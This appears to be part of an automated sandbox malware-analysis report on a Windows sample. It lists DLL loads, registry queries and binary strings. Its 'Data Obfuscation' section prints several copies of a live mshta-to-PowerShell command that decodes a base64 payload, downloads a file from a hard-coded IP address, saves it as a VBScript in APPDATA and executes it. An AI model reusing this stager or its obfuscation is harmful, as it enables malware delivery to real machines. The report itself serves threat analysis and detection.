                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2139243463.0000000006F4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2136722532.00000000069C0000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.pdb source: powershell.exe, 00000003.00000002.1827619214.00000000056FA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2139243463.0000000006F4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2136722532.00000000069C0000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2139243463.0000000006F4B000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLElud